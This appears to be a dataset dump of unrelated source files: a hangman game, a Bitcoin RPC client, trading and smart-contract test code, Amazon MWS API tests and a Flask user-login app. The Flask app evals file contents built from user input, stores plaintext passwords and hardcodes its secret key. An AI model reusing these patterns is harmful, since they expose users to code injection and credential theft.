You have: {hints} hints.
type "leave" to exit settings, type hints/lives to change their value""")
elif setting_input == "hints":
hints = int(input("How many hints do you want? "))
elif setting_input == "lives":
lives = int(input("How many lives do you want? "))
else:
print("You're still in the settings menu, type leave to leave or type in hints or lives to change those values.")
elif initial_input == "quit":
quit("Thanks for playin!")
else:
print("Sorry! I don't get what you mean, type help for more help")
while in_game is True and completed is False:
guess = custom_input("").upper()
if guess in guessed_letters:
print(f"""{Fore.BLUE}Sorry "{guess}", matches one of your guessed letters!
({guessed_letters}){Fore.RESET}""")
print()
elif guess not in word:
lives -= 1
print(f"{Fore.RED}Sorry, that isn't in the word.{Fore.RESET}")
guessed_letters.append(guess)
elif guess in word and len(guess) == 1:
print(f"{Fore.BLUE}Awesome! You got a letter! {Fore.RESET}")
guessed_letters.append(guess)
elif len(guess) == len(word):
if guess == word:
print(f"{Fore.LIGHTMAGENTA_EX}You've guessed the word!{Fore.RESET}")
completed = True
else:
print(f"{Fore.RED}Sorry, that's not the correct word.{Fore.RESET}")
lives -= 1
elif len(guess) > len(word) or len(guess) > 3:
print(f"{Fore.BLUE}It seems like you tried to guess the word, but it was too long/short.{Fore.RESET}")
print()
if completed is False:
ig_menu = ""
for letters in word:
if letters in guessed_letters:
ig_menu += letters
else:
ig_menu += "_ "
print(f"{ig_menu} (You still have {lives} lives/life left.)")
if ig_menu == word:
print(f"{Fore.LIGHTMAGENTA_EX}Congratulations! You've guessed the word, {Fore.WHITE}{word}! "
f"{Fore.LIGHTMAGENTA_EX}You had {Fore.WHITE}{lives}{Fore.LIGHTMAGENTA_EX} lives left!{Fore.RESET}")
print()
completed = True
repeat_game = input("Do you want to play again? Y/N ").lower()
if repeat_game == "y":
in_game = False
elif repeat_game == "n":
quit("Thanks for playing, see ya!")
else:
print("I don't know what that input is, type y/n")
if lives == 0:
print(f"{Fore.RED}Sorry! You ran out of lives!")
repeat_game = input("Do you want to play again? Y/N ").lower()
print()
if repeat_game == "y":
in_game = False
continue
elif repeat_game == "n":
quit("Thanks for playing, see ya!")
else:
print("I don't know what that input is, type y/n")
``` |
{
"source": "1Blackdiamondsc/bitcoincli",
"score": 2
} |
#### File: bitcoincli/bitcoincli/client.py
```python
import json
import logging
import requests
from base64 import b64encode
log = logging.getLogger(__name__)
class Bitcoin():
__id_count = 0
def __init__(self,
rpcuser,
rpcpasswd,
rpchost,
rpcport,
rpc_call=None
):
self.__rpcuser = rpcuser
self.__rpcpasswd = <PASSWORD>
self.__rpchost = rpchost
self.__rpcport = rpcport
self.__auth_header = ' '.join(
['Basic', b64encode(':'.join([rpcuser, rpcpasswd]).encode()).decode()]
)
self.__headers = {'Host': self.__rpchost,
'User-Agent': 'Bitcoin python binding',
'Authorization': self.__auth_header,
'Content-type': 'application/json'
}
self.__rpc_call = rpc_call
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
if self.__rpc_call is not None:
name = "%s.%s" % (self.__rpc_call, name)
return Bitcoin(self.__rpcuser,
self.__rpcpasswd,
self.__rpchost,
self.__rpcport,
name)
def __call__(self, *args):
Bitcoin.__id_count += 1
postdata = {'params': args,
'method': self.__rpc_call,
'id': Bitcoin.__id_count}
protocol = 'https' if int(self.__rpcport) == 443 else 'http'
url = '{0}://{1}:{2}'.format(protocol, self.__rpchost, self.__rpcport)
encoded = json.dumps(postdata)
log.info("Request: %s" % encoded)
r = requests.post(url, data=encoded, headers=self.__headers)
if r.status_code == 200:
log.info("Response: %s" % r.json())
return r.json()['result']
else:
log.error("Error! Status code: %s" % r.status_code)
log.error("Text: %s" % r.text)
log.error("Json: %s" % r.json())
return r.json()
``` |
{
"source": "1Blackdiamondsc/dwx-zeromq-connector",
"score": 2
} |
#### File: template/modules/DWX_ZMQ_Execution.py
```python
from pandas import to_datetime
from time import sleep
class DWX_ZMQ_Execution():
def __init__(self, _zmq):
self._zmq = _zmq
##########################################################################
def _execute_(self,
_exec_dict,
_verbose=False,
_delay=0.1,
_wbreak=10):
_check = ''
# Reset thread data output
self._zmq._set_response_(None)
# OPEN TRADE
if _exec_dict['_action'] == 'OPEN':
_check = '_action'
self._zmq._DWX_MTX_NEW_TRADE_(_order=_exec_dict)
# CLOSE TRADE
elif _exec_dict['_action'] == 'CLOSE':
_check = '_response_value'
self._zmq._DWX_MTX_CLOSE_TRADE_BY_TICKET_(_exec_dict['_ticket'])
if _verbose:
print('\n[{}] {} -> MetaTrader'.format(_exec_dict['_comment'],
str(_exec_dict)))
# While loop start time reference
_ws = to_datetime('now')
# While data not received, sleep until timeout
while self._zmq._valid_response_('zmq') == False:
sleep(_delay)
if (to_datetime('now') - _ws).total_seconds() > (_delay * _wbreak):
break
# If data received, return DataFrame
if self._zmq._valid_response_('zmq'):
if _check in self._zmq._get_response_().keys():
return self._zmq._get_response_()
# Default
return None
##########################################################################
``` |
{
"source": "1Blackdiamondsc/nftoken",
"score": 2
} |
#### File: nftoken/tests/conftest.py
```python
import functools
import pytest
# test isolation, always use!
@pytest.fixture(autouse=True)
def isolation(fn_isolation):
pass
# contract deployment
@pytest.fixture(scope="module")
def nft(accounts, NFToken):
token = accounts[0].deploy(NFToken, "Test NFT", "NFT", 30000)
token.transfer(accounts[1], 10000, {"from": accounts[0]})
token.transfer(accounts[2], 10000, {"from": accounts[0]})
token.transfer(accounts[3], 10000, {"from": accounts[0]})
yield token
@pytest.fixture(scope="module")
def nftmint(accounts, NFTokenMintable):
token = accounts[0].deploy(NFTokenMintable, "Test NFT", "NFT", 0)
yield token
# range and balance checks
@pytest.fixture(scope="module")
def check_ranges(accounts, nft):
upper = nft.totalSupply() + 1
yield functools.partial(_check_ranges, accounts, upper, nft=nft)
def _check_ranges(accounts, upper, *expected_ranges, nft=None):
for num, expected in enumerate(expected_ranges, start=1):
account = accounts[num]
ranges = nft.rangesOf(account)
assert set(ranges) == set(expected)
assert nft.balanceOf(account) == sum((i[1] - i[0]) for i in ranges)
for start, stop in ranges:
if stop - start == 1:
assert nft.getRange(start)[:3] == (account, start, stop)
continue
for i in range(max(1, start - 1), start + 2):
try:
data = nft.getRange(i)
except Exception:
raise AssertionError(f"Could not get range pointer {i} for account {num}")
if i < start:
assert data[0] != account
else:
assert data[0] == account
for i in range(stop - 1, min(stop + 1, upper)):
data = nft.getRange(i)
if i < stop:
assert data[0] == account
else:
assert data[0] != account
```
#### File: tests/stateful/test_transfer_one.py
```python
import brownie
from brownie.test import strategy
def test_stateful_transfer_one_token(BaseStateMachine, state_machine, NFToken, accounts):
"""
Stateful test that verifies range pointer modifications when
dealing with single token transfers and small ranges.
"""
class StateMachine(BaseStateMachine):
st_amount = strategy("uint256", max_value=1000000)
st_sender = strategy("address")
st_receiver = strategy("address")
def __init__(cls, NFToken, accounts):
super().__init__(cls, NFToken, accounts, len(accounts))
for account in accounts[1:]:
cls.nft.transfer(account, 1, {"from": accounts[0]})
def setup(self):
self.balances = {i: 1 for i in self.accounts}
# transfers a single token
def rule_transfer_one(self, st_sender, st_receiver):
if self.balances[st_sender]:
self.nft.transfer(st_receiver, 1, {"from": st_sender})
self.balances[st_sender] -= 1
self.balances[st_receiver] += 1
else:
with brownie.reverts("dev: underflow"):
self.nft.transfer(st_receiver, 1, {"from": st_sender})
# transfers a single token using transferRange
def rule_transfer_range_one(self, st_sender, st_receiver):
if self.balances[st_sender]:
start = self.nft.rangesOf(st_sender)[-1][0]
self.nft.transferRange(st_receiver, start, start + 1, {"from": st_sender})
self.balances[st_sender] -= 1
self.balances[st_receiver] += 1
else:
with brownie.reverts("dev: underflow"):
self.nft.transfer(st_receiver, 1, {"from": st_sender})
settings = {"stateful_step_count": 20, "max_examples": 20}
state_machine(StateMachine, NFToken, accounts, settings=settings)
``` |
{
"source": "1Blackdiamondsc/python-amazon-mws",
"score": 4
} |
#### File: mws/utils/crypto.py
```python
import base64
import hashlib
def calc_md5(string):
"""Generates base64-encoded MD5 hash of `string`."""
md5_hash = hashlib.md5()
md5_hash.update(string)
return base64.b64encode(md5_hash.digest()).strip(b"\n")
def response_md5_is_valid(response):
"""Checks the MD5 hash of ``response.content`` against that response's
"content-md5" header. Returns ``True`` if they match, else ``False``.
If the response does not include a ``content-md5`` header, we can't verify it,
but we should not hold up that response. Thus, returns ``True`` in this case.
"""
if "content-md5" not in response.headers:
# We can't check a hash that doesn't exist,
# but we won't stop responses that don't supply one.
return True
hash_ = calc_md5(response.content)
return response.headers["content-md5"].encode() == hash_
```
#### File: mws/utils/timezone.py
```python
import datetime
def mws_utc_now():
"""Returns the current UTC time, as expected by MWS.
Note that we set microseconds to 0 automatically with this method:
if you want the true UTC datetime, just run `datetime.datetime.utcnow()`.
"""
return datetime.datetime.utcnow().replace(microsecond=0)
```
#### File: tests/deprecations/test_remove_in_v10.py
```python
import pytest
from mws.mws import MWS
from mws.utils.deprecation import RemovedInPAM10Warning
def test_mws_enumerate_params_method_removed(mws_credentials):
mws = MWS(**mws_credentials)
with pytest.warns(RemovedInPAM10Warning):
mws.enumerate_param("Something", [1, 2, 3])
```
#### File: tests/request_methods/test_finances.py
```python
import unittest
import datetime
import mws
from mws.utils import clean_date
from .utils import CommonAPIRequestTools
class FinancesTestCase(CommonAPIRequestTools, unittest.TestCase):
"""Test cases for Finances."""
api_class = mws.Finances
# TODO: Add remaining methods for Finances
def test_list_financial_event_groups(self):
"""
ListFinancialEventGroups operation.
"""
created_after = datetime.datetime.utcnow()
created_before = datetime.datetime.utcnow()
max_results = 659
params = self.api.list_financial_event_groups(
created_after=created_after,
created_before=created_before,
max_results=max_results,
)
self.assert_common_params(params, action="ListFinancialEventGroups")
self.assertEqual(
params["FinancialEventGroupStartedAfter"], clean_date(created_after)
)
self.assertEqual(
params["FinancialEventGroupStartedBefore"], clean_date(created_before)
)
self.assertEqual(params["MaxResultsPerPage"], str(max_results))
def test_list_financial_event_groups_by_next_token(self):
"""
ListFinancialEventGroupsByNextToken operation, via method decorator.
"""
next_token = "<PASSWORD>"
params = self.api.list_financial_event_groups(next_token=next_token)
self.assert_common_params(params, action="ListFinancialEventGroupsByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_list_financial_event_groups_by_next_token_alias(self):
"""
ListFinancialEventGroupsByNextToken operation, via alias method.
"""
next_token = "<PASSWORD>"
params = self.api.list_financial_event_groups_by_next_token(next_token)
self.assert_common_params(params, action="ListFinancialEventGroupsByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_list_financial_events(self):
"""
ListFinancialEvents operation.
"""
posted_after = datetime.datetime.utcnow()
posted_before = datetime.datetime.utcnow()
amazon_order_id = "123-4567890-1234567"
financial_event_group_id = "22YgYW55IGNhcm5hbCBwbGVhEXAMPLE"
max_results = 156
params = self.api.list_financial_events(
financial_event_group_id=financial_event_group_id,
amazon_order_id=amazon_order_id,
posted_after=posted_after,
posted_before=posted_before,
max_results=max_results,
)
self.assert_common_params(params, action="ListFinancialEvents")
self.assertEqual(params["FinancialEventGroupId"], financial_event_group_id)
self.assertEqual(params["AmazonOrderId"], amazon_order_id)
self.assertEqual(params["PostedAfter"], clean_date(posted_after))
self.assertEqual(params["PostedBefore"], clean_date(posted_before))
self.assertEqual(params["MaxResultsPerPage"], str(max_results))
def test_list_financial_events_by_next_token(self):
"""
ListFinancialEventsByNextToken operation, via method decorator.
"""
next_token = "<PASSWORD>"
params = self.api.list_financial_events(next_token=next_token)
self.assert_common_params(params, action="ListFinancialEventsByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_list_financial_events_by_next_token_alias(self):
"""
ListFinancialEventsByNextToken operation, via alias method.
"""
next_token = "<PASSWORD>"
params = self.api.list_financial_events_by_next_token(next_token)
self.assert_common_params(params, action="ListFinancialEventsByNextToken")
self.assertEqual(params["NextToken"], next_token)
```
#### File: tests/request_methods/test_inventory.py
```python
import unittest
import datetime
import mws
from mws.utils import clean_date
from .utils import CommonAPIRequestTools
class InventoryTestCase(CommonAPIRequestTools, unittest.TestCase):
"""Test cases for Inventory."""
api_class = mws.Inventory
def test_list_inventory_supply(self):
"""ListInventorySupply operation."""
now = datetime.datetime.utcnow()
skus = ["thing1", "thing2"]
response_group = "Detailed"
params = self.api.list_inventory_supply(
skus, now, response_group=response_group
)
self.assert_common_params(params, action="ListInventorySupply")
self.assertEqual(params["QueryStartDateTime"], clean_date(now))
self.assertEqual(params["ResponseGroup"], "Detailed")
self.assertEqual(params["SellerSkus.member.1"], "thing1")
self.assertEqual(params["SellerSkus.member.2"], "thing2")
def test_list_inventory_supply_by_next_token(self):
"""ListInventorySupplyByNextToken operation, using `next_token` argument."""
next_token = "token_foobar"
params = self.api.list_inventory_supply(next_token=next_token)
self.assert_common_params(params, action="ListInventorySupplyByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_list_inventory_supply_by_next_token_alias(self):
"""ListInventorySupplyByNextToken operation, using alias method."""
next_token = "token_foobar"
params = self.api.list_inventory_supply_by_next_token(next_token)
self.assert_common_params(params, action="ListInventorySupplyByNextToken")
self.assertEqual(params["NextToken"], next_token)
```
#### File: tests/request_methods/test_merchantfulfillment.py
```python
import datetime
import unittest
import mws
from .utils import (
CommonAPIRequestTools,
clean_date,
clean_string,
clean_bool,
)
class MerchantFulfillmentTestCase(CommonAPIRequestTools, unittest.TestCase):
"""Test cases for MerchantFulfillment."""
api_class = mws.MerchantFulfillment
# TODO: Add remaining methods for MerchantFulfillment
def test_get_eligible_shipping_services(self):
"""GetEligibleShippingServices operation."""
amazon_order_id = "903-9939455-1336669"
seller_order_id = "something-or-other"
items = [
{"OrderItemId": "1234567890", "Quantity": "1"},
{"OrderItemId": "0987654321", "Quantity": "5"},
]
# Fake generated name and address, not likely a real person or phone number.
ship_from_address = {
"Name": "<NAME>",
"AddressLine1": "2025 Foley Street",
"City": "Miramar",
"StateOrProvinceCode": "FL",
"PostalCode": "33025",
"CountryCode": "US",
"Email": "<EMAIL>",
"Phone": "954-655-0094",
}
package_dimensions = {
"Length": "12",
"Width": "34",
"Height": "25",
"Unit": "centimeters",
}
weight = {
"Value": "308",
"Unit": "grams",
}
must_arrive_by_date = datetime.datetime.utcnow()
ship_date = datetime.datetime.utcnow() + datetime.timedelta(days=14)
shipping_service_options = {
"DeliveryExperience": "DeliveryConfirmationWithoutSignature",
"CarrierWillPickUp": False,
"DeclaredValue.Amount": "10.00",
"DeclaredValue.CurrencyCode": "USD",
}
label_customization = {
"CustomTextForLabel": "NO ALLIGATORS!",
"StandardIdForLabel": "AmazonOrderId",
}
include_complex_options = True
# Get request params
params = self.api.get_eligible_shipping_services(
amazon_order_id=amazon_order_id,
seller_order_id=seller_order_id,
items=items,
ship_from_address=ship_from_address,
package_dimensions=package_dimensions,
weight=weight,
must_arrive_by_date=must_arrive_by_date,
ship_date=ship_date,
shipping_service_options=shipping_service_options,
label_customization=label_customization,
include_complex_options=include_complex_options,
)
self.assert_common_params(params, action="GetEligibleShippingServices")
# Check for our expected params
# fmt: off
expected = {
"ShipmentRequestDetails.AmazonOrderId": clean_string(amazon_order_id),
"ShipmentRequestDetails.SellerOrderId": clean_string(seller_order_id),
"ShipmentRequestDetails.MustArriveByDate": clean_date(must_arrive_by_date),
"ShipmentRequestDetails.PackageDimensions.Length": clean_string(package_dimensions["Length"]),
"ShipmentRequestDetails.PackageDimensions.Width": clean_string(package_dimensions["Width"]),
"ShipmentRequestDetails.PackageDimensions.Height": clean_string(package_dimensions["Height"]),
"ShipmentRequestDetails.PackageDimensions.Unit": clean_string(package_dimensions["Unit"]),
"ShipmentRequestDetails.Weight.Value": clean_string(weight["Value"]),
"ShipmentRequestDetails.Weight.Unit": clean_string(weight["Unit"]),
"ShipmentRequestDetails.ShipDate": clean_date(ship_date),
"ShipmentRequestDetails.ShipFromAddress.Name": clean_string(ship_from_address["Name"]),
"ShipmentRequestDetails.ShipFromAddress.AddressLine1": clean_string(ship_from_address["AddressLine1"]),
"ShipmentRequestDetails.ShipFromAddress.City": clean_string(ship_from_address["City"]),
"ShipmentRequestDetails.ShipFromAddress.StateOrProvinceCode": clean_string(ship_from_address["StateOrProvinceCode"]),
"ShipmentRequestDetails.ShipFromAddress.PostalCode": clean_string(ship_from_address["PostalCode"]),
"ShipmentRequestDetails.ShipFromAddress.CountryCode": clean_string(ship_from_address["CountryCode"]),
"ShipmentRequestDetails.ShipFromAddress.Email": clean_string(ship_from_address["Email"]),
"ShipmentRequestDetails.ShipFromAddress.Phone": clean_string(ship_from_address["Phone"]),
"ShipmentRequestDetails.ShippingServiceOptions.DeliveryExperience": clean_string(shipping_service_options["DeliveryExperience"]),
"ShipmentRequestDetails.ShippingServiceOptions.CarrierWillPickUp": clean_bool(shipping_service_options["CarrierWillPickUp"]),
"ShipmentRequestDetails.ShippingServiceOptions.DeclaredValue.CurrencyCode": clean_string(shipping_service_options["DeclaredValue.CurrencyCode"]),
"ShipmentRequestDetails.ShippingServiceOptions.DeclaredValue.Amount": clean_string(shipping_service_options["DeclaredValue.Amount"]),
"ShipmentRequestDetails.ItemList.Item.1.OrderItemId": clean_string(items[0]["OrderItemId"]),
"ShipmentRequestDetails.ItemList.Item.1.Quantity": clean_string(items[0]["Quantity"]),
"ShipmentRequestDetails.ItemList.Item.2.OrderItemId": clean_string(items[1]["OrderItemId"]),
"ShipmentRequestDetails.ItemList.Item.2.Quantity": clean_string(items[1]["Quantity"]),
"ShippingOfferingFilter.IncludeComplexShippingOptions": clean_bool(include_complex_options),
}
# fmt: on
for key, val in expected.items():
self.assertEqual(params[key], val)
# def test_create_shipment(self):
# """CreateShipment operation."""
# params = self.api.create_shipment()
# self.assert_common_params(params, action="CreateShipment")
def test_get_additional_seller_inputs(self):
"""GetAdditionalSellerInputs operation."""
order_id = "922-2942641-9412606"
shipping_service_id = "CHINA_POST_E_COURIER_PRI"
ship_from_address = {
"Name": "Shenzhen Address",
"AddressLine1": "test address",
"City": "Shenzhen",
"StateOrProvinceCode": "Guangdong",
"PostalCode": "510810",
"CountryCode": "CN",
"Email": "<EMAIL>",
"Phone": "555-555-5555",
}
params = self.api.get_additional_seller_inputs(
order_id=order_id,
shipping_service_id=shipping_service_id,
ship_from_address=ship_from_address,
)
self.assert_common_params(params, action="GetAdditionalSellerInputs")
# fmt: off
expected = {
"OrderId": clean_string(order_id),
"ShippingServiceId": clean_string(shipping_service_id),
"ShipFromAddress.Name": clean_string(ship_from_address["Name"]),
"ShipFromAddress.AddressLine1": clean_string(ship_from_address["AddressLine1"]),
"ShipFromAddress.City": clean_string(ship_from_address["City"]),
"ShipFromAddress.StateOrProvinceCode": clean_string(ship_from_address["StateOrProvinceCode"]),
"ShipFromAddress.PostalCode": clean_string(ship_from_address["PostalCode"]),
"ShipFromAddress.CountryCode": clean_string(ship_from_address["CountryCode"]),
"ShipFromAddress.Email": clean_string(ship_from_address["Email"]),
"ShipFromAddress.Phone": clean_string(ship_from_address["Phone"]),
}
# fmt: on
for key, val in expected.items():
self.assertEqual(params[key], val)
def test_get_shipment(self):
"""GetShipment operation."""
shipment_id = "UCXN7ZubAj"
params = self.api.get_shipment(
shipment_id=shipment_id,
)
self.assert_common_params(params, action="GetShipment")
self.assertEqual(params["ShipmentId"], shipment_id)
def test_cancel_shipment(self):
"""CancelShipment operation."""
shipment_id = "C6Pvk0b2yZ"
params = self.api.cancel_shipment(
shipment_id=shipment_id,
)
self.assert_common_params(params, action="CancelShipment")
self.assertEqual(params["ShipmentId"], shipment_id)
```
#### File: tests/request_methods/test_orders.py
```python
import datetime
import unittest
import mws
from mws.utils import clean_date
from .utils import CommonAPIRequestTools
class OrdersTestCase(CommonAPIRequestTools, unittest.TestCase):
"""Test cases for Orders."""
api_class = mws.Orders
# TODO: Add remaining methods for Orders
def test_list_orders(self):
"""ListOrders operation."""
created_after = datetime.datetime.utcnow()
created_before = datetime.datetime.utcnow() + datetime.timedelta(hours=1)
last_updated_after = datetime.datetime.utcnow() + datetime.timedelta(hours=2)
last_updated_before = datetime.datetime.utcnow() + datetime.timedelta(hours=3)
max_results = 83
marketplace_ids = [
"DV1t7ZOrjM",
"LbGcgtGwEe",
]
order_statuses = [
"PendingAvailability",
"Unshipped",
]
fulfillment_channels = [
"AFN",
"MFN",
]
payment_methods = [
"COD",
"CVS",
]
buyer_email = "<EMAIL>"
seller_order_id = "LbGcgtGwEe"
tfm_shipment_statuses = [
"PendingPickUp",
"AtDestinationFC",
]
params = self.api.list_orders(
marketplace_ids=marketplace_ids,
created_after=created_after,
created_before=created_before,
last_updated_after=last_updated_after,
last_updated_before=last_updated_before,
order_statuses=order_statuses,
fulfillment_channels=fulfillment_channels,
payment_methods=payment_methods,
buyer_email=buyer_email,
seller_order_id=seller_order_id,
max_results=max_results,
tfm_shipment_statuses=tfm_shipment_statuses,
)
self.assert_common_params(params, action="ListOrders")
self.assertEqual(params["CreatedAfter"], clean_date(created_after))
self.assertEqual(params["CreatedBefore"], clean_date(created_before))
self.assertEqual(params["LastUpdatedAfter"], clean_date(last_updated_after))
self.assertEqual(params["LastUpdatedBefore"], clean_date(last_updated_before))
self.assertEqual(params["BuyerEmail"], "dudley.do.right%40example.com")
self.assertEqual(params["SellerOrderId"], seller_order_id)
self.assertEqual(params["MaxResultsPerPage"], str(max_results))
self.assertEqual(params["OrderStatus.Status.1"], order_statuses[0])
self.assertEqual(params["OrderStatus.Status.2"], order_statuses[1])
self.assertEqual(params["MarketplaceId.Id.1"], marketplace_ids[0])
self.assertEqual(params["MarketplaceId.Id.2"], marketplace_ids[1])
self.assertEqual(
params["FulfillmentChannel.Channel.1"], fulfillment_channels[0]
)
self.assertEqual(
params["FulfillmentChannel.Channel.2"], fulfillment_channels[1]
)
self.assertEqual(params["PaymentMethod.Method.1"], payment_methods[0])
self.assertEqual(params["PaymentMethod.Method.2"], payment_methods[1])
self.assertEqual(params["TFMShipmentStatus.Status.1"], tfm_shipment_statuses[0])
self.assertEqual(params["TFMShipmentStatus.Status.2"], tfm_shipment_statuses[1])
def test_list_orders_by_next_token(self):
"""ListOrdersByNextToken operation, via method decorator."""
next_token = "<PASSWORD>"
params = self.api.list_orders(next_token=next_token)
self.assert_common_params(params, action="ListOrdersByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_list_orders_by_next_token_alias(self):
"""ListOrdersByNextToken operation, via alias method."""
next_token = "<PASSWORD>"
params = self.api.list_orders_by_next_token(next_token)
self.assert_common_params(params, action="ListOrdersByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_get_order(self):
"""GetOrder operation."""
amazon_order_ids = [
"983-3553534-8677372",
"663-9447020-5093135",
"918-0947007-5135971",
]
params = self.api.get_order(amazon_order_ids)
self.assert_common_params(params, action="GetOrder")
self.assertEqual(params["AmazonOrderId.Id.1"], amazon_order_ids[0])
self.assertEqual(params["AmazonOrderId.Id.2"], amazon_order_ids[1])
self.assertEqual(params["AmazonOrderId.Id.3"], amazon_order_ids[2])
def test_list_order_items(self):
"""ListOrderItems operation."""
amazon_order_id = "695-3659745-3659863"
params = self.api.list_order_items(amazon_order_id=amazon_order_id)
self.assert_common_params(params, action="ListOrderItems")
self.assertEqual(params["AmazonOrderId"], amazon_order_id)
def test_list_order_items_by_next_token(self):
"""ListOrderItemsByNextToken operation, via method decorator."""
next_token = "<PASSWORD>"
params = self.api.list_order_items(next_token=next_token)
self.assert_common_params(params, action="ListOrderItemsByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_list_order_items_by_next_token_alias(self):
"""ListOrderItemsByNextToken operation, via alias method."""
next_token = "<PASSWORD>"
params = self.api.list_order_items_by_next_token(next_token)
self.assert_common_params(params, action="ListOrderItemsByNextToken")
self.assertEqual(params["NextToken"], next_token)
``` |
{
"source": "1Blackdiamondsc/seed-liquidity",
"score": 2
} |
#### File: seed-liquidity/tests/conftest.py
```python
import pytest
@pytest.fixture(scope="function", autouse=True)
def shared_setup(fn_isolation):
pass
@pytest.fixture
def agent(accounts):
return accounts.at("0x3e40D73EB977Dc6a537aF587D48316feE66E9C8c", force=True)
@pytest.fixture
def lido(interface, agent):
return interface.ERC20("0x5A98FcBEA516Cf06857215779Fd812CA3beF1B32", owner=agent)
@pytest.fixture
def whale(accounts):
return accounts.at("0x2F0b23f53734252Bda2277357e97e1517d6B042A", force=True)
@pytest.fixture
def weth(interface, whale):
return interface.ERC20("0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2", owner=whale)
@pytest.fixture
def uniswap(interface):
return interface.UniswapRouter("0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D")
@pytest.fixture
def seed(SeedLiquidity, uniswap, lido, weth, accounts):
return SeedLiquidity.deploy(
uniswap,
[lido, weth],
["10000000 ether", "150 ether"],
14 * 86400,
0,
{"from": accounts[0]},
)
@pytest.fixture
def seed_with_waitime(SeedLiquidity, uniswap, lido, weth, accounts):
return SeedLiquidity.deploy(
uniswap,
[lido, weth],
["10000000 ether", "150 ether"],
14 * 86400,
100,
{"from": accounts[0]},
)
```
#### File: seed-liquidity/tests/test_seed.py
```python
def test_seed(seed, lido, weth, agent, whale, interface):
pair = interface.ERC20(seed.pair())
lido_amount = seed.target(0)
weth_amount = seed.target(1)
lido.approve(seed, lido_amount)
weth.approve(seed, weth_amount)
seed.deposit([lido_amount, 0], {'from': agent})
assert lido.balanceOf(seed) == lido_amount
assert seed.balances(agent, 0) == lido_amount
assert seed.totals(0) == lido_amount
seed.deposit([0, weth_amount], {'from': whale})
assert weth.balanceOf(seed) == weth_amount
assert seed.balances(whale, 1) == weth_amount
assert seed.totals(1) == weth_amount
seed.provide()
assert seed.liquidity() > 0
assert pair.balanceOf(seed) == seed.liquidity()
assert pair.balanceOf(seed) + 1000 == pair.totalSupply()
seed.claim({'from': agent})
assert pair.balanceOf(agent) == seed.liquidity() // 2
seed.claim({'from': whale})
assert pair.balanceOf(whale) == seed.liquidity() // 2
def test_bail(seed, lido, weth, agent, whale, chain):
lido_before = lido.balanceOf(agent)
weth_before = weth.balanceOf(whale)
lido_amount = seed.target(0)
weth_amount = seed.target(1)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount, 0], {'from': agent})
assert lido.balanceOf(agent) == lido_before - lido_amount
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount], {'from': whale})
assert weth.balanceOf(whale) == weth_before - weth_amount
chain.sleep(14 * 86400)
seed.bail({'from': agent})
assert lido.balanceOf(agent) == lido_before
seed.bail({'from': whale})
assert weth.balanceOf(whale) == weth_before
``` |
{
"source": "1blackghost/Fall_Management",
"score": 3
} |
#### File: 1blackghost/Fall_Management/main.py
```python
from flask import *
app=Flask(__name__)
app.config['SECRET_KEY']="thisisasecretkey"
@app.route("/logout")
def logout():
if 'user' in session and 'role' in session:
session.pop('user',None)
session.pop('role',None)
return redirect(url_for('home'))
@app.route('/home',methods=['GET','POST'])
def root():
if 'user' in session and 'role' in session:
if session['step']=="False":
if request.method=='POST':
history=request.form['history']
medicines=request.form['medicines']
doctor=request.form["doctor"]
r1=request.form['r1']
r2=request.form['r2']
with open("add.txt",'r') as f:
d=eval(f.read())
main=[]
main.append(session['user'])
main.append(history)
main.append(medicines)
main.append(doctor)
main.append(r1)
main.append(r2)
d.append(main)
with open("add.txt",'w') as f:
f.write(str(d))
with open("data.txt",'r') as f:
d=eval(f.read())
for i in d:
if i[0]==session['user']:
i[5]="True"
with open('data.txt','w') as f:
f.write(str(d))
session['step']="True"
return redirect(url_for('root'))
return render_template('step2.html')
if session['role']=="Ambulance Driver":
with open("data.txt",'r') as f:
d=eval(f.read())
for i in d:
if i[0]==session['user']:
try:
param=i[4]
param=param.split(":")
lat=param[4]
lng=param[6]
except:
return render_template("ambulance.html",username=session['user'],error="Oops! Maps Could Not Be Loaded With Location Off!")
if request.method=="POST":
return render_template('map.html',lat=lat,lng=lng,name="Your Location: ",error="")
return render_template("ambulance.html",username=session['user'])
with open("add.txt",'r') as f:
d=eval(f.read())
for i in d:
if i[0]==session['user']:
history=i[1]
medicines=i[2]
doctor=i[3]
r1=i[4]
r2=i[5]
return render_template('root.html',username=session['user'],history=history,medicines=medicines,doctor=doctor,r1=r1,r2=r2)
else:
return redirect(url_for('login'))
@app.errorhandler(404)
def page_not_found(e):
print(e)
return render_template('404.html')
@app.route("/")
def home():
return render_template("home.html")
@app.route("/signup",methods=["GET","POST"])
def signup():
if request.method=="POST":
username=request.form['name']
email=request.form['email']
password=request.form['password']
conf_password=request.form['conf']
loc=request.form["demo"]
print(password,conf_password)
error="Something went wrong!"
try:
role=request.form['options']
except:
return render_template("signup.html",error=error)
if username=="":
return render_template("signup.html",error=error)
if password=="":
return render_template("signup.html",error=error)
if email=="":
return render_template("signup.html",error=error)
if conf_password=="":
return render_template("signup.html",error=error)
if role=="":
return render_template("signup.html",error="Role Error")
if str(password)!=str(conf_password):
return render_template("signup.html",error="Passwords Don't Match!")
data_list=[]
data_list.append(username)
data_list.append(email)
data_list.append(password)
data_list.append(role)
data_list.append(loc)
if role=="User":
data_list.append("False")
else:
data_list.append("None")
with open("data.txt",'r') as f:
d=eval(f.read())
d.append(data_list)
with open('data.txt','w') as f:
f.write(str(d))
session['user']=str(username)
session['role']=str(role)
if role=="User":
session['step']=str("False")
else:
session['step']=str("True")
return redirect(url_for("root"))
return render_template("signup.html")
@app.route("/login",methods=['GET','POST'])
def login():
if request.method=="POST":
username=request.form['name']
password=request.form['password']
loc=request.form["demo"]
with open("data.txt","r") as f:
d=eval(f.read())
In=False
for i in d:
if i[0]==username or i[1]==username:
if i[2]==password:
session['user']=username
session['role']=str(i[3])
session['step']=i[5]
In=True
return redirect(url_for('root'))
if not In:
return render_template("login.html",error="No Match Or User Not Found!")
return render_template("login.html")
if __name__=="__main__":
app.run(debug=True)
``` |
{
"source": "1Blademaster/siegeStatsGrabber",
"score": 2
